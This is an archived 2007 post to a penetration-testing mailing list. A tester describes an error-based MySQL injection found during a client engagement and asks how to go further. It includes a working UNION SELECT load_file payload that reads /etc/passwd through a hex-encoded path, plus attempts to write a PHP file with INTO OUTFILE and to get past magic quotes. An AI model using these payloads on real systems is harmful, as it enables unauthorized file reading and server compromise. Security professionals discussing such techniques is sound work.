Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Pen-Test
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

Breaking from MySQL to Linux system (SQL Injection).

from [Danett song] Network Security [Permanent Link]
Subject: Breaking from MySQL to Linux system (SQL Injection).
Date: Sat, 21 Jul 2007 22:28:12 -0300 (ART) 
Hello

I'm pentesting a customer in a blackbox method, I
found a Mysql Injection based in error response.

I'm able to explore it using a query like this one:

http://site/files/index.php?url=search.php&id=251%20UNION%20SELECT%20load_file(0x2F6574632F706173737764),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL/*&coditem=251

It worked ok, so I could extract the contents of
passwd file.

The server is with magic quotes on, so i needed to hex
enquote the filenames. The php files are connected as
user mysql.

I made some tests without sucess:

a) Via another flaw I could disclosure the
DocumentRoot, which is /web/site, If I try to read the
index.php file, using the same injection, but only
replacing the /etc/passwd with
/web/site/files/index.php (obvious hex encoding it) I
got no reply! It doesn't return any content of the
index.php! It also work for /etc/hosts. Why it isn't
working? Strange ahn? The default umask allow every
users to read new created files, I think is very
uncommon a developer which remove the read permissions
of all .php file he upload. Do you mean that is the
case? Or I'm missing something?


b) My goal is be able to gain acess to the linux
running, the server have only the port 80 opened. My
best try was to create a .php file inside the
DocumentRoot and try to acess it via browser, but this
file never got created. I'm not sure if cause it
doesn't have permissions, or problems related with
quotes!

I tryed using the method in question a) but replacing
the union for:

Select <?phpinfo.php>? into outfile 
'/http/arquivos/phpinfo.php'

I tryed encoding both the php code as the filename
with hex. I also tryed replace the quote (') in the
name by (%). But nothing worked.

The OWASP testing guide say that if my server have
magic_quotes on which is my case, it's not possible.

http://www.owasp.org/index.php/Testing_for_MySQL

However, NGSsoftware disagree:

http://www.ngssoftware.com/papers/HackproofingMySQL.pdf


I also tryed to use char() encoding and the GBK 
0xbf27 (never had tryed it before, but appear not work
in this case).

Any idea how to complain this attack?

c) Cause I'm using a bunch of NULL to validade the
union statment, I can't do (at last i don't know how
to do) complex select, which require use the comma
(,), else it will break my union statment. How to deal
when my injected query have MORE comma's than the
comma's used in NULL to validade the select?

d) Any idea how to break from mysql to the linux
system?

Cheers


      Flickr agora em português. Você cria, todo mundo vê.
http://www.flickr.com.br/

------------------------------------------------------------------------
This list is sponsored by: Cenzic

Need to secure your web apps NOW?
Cenzic finds more, "real" vulnerabilities fast.
Click to try it, buy it or download a solution FREE today!

http://www.cenzic.com/downloads
------------------------------------------------------------------------
[More messages with this same subject...]




<Prev in Thread] Current Thread [Next in Thread>
Previous by Date:  Re: dissect TCP/IP flow, Jamie Riden
Next by Date:  Re: Hping2, packet crafting question..., jasonisnow
Previous by Thread:  First TCP packet, va . pentest
Next by Thread:  Re: Breaking from MySQL to Linux system (SQL Injection)., Marco Ivaldi
Indexes:  [Date] [Thread] [Top] [All Lists]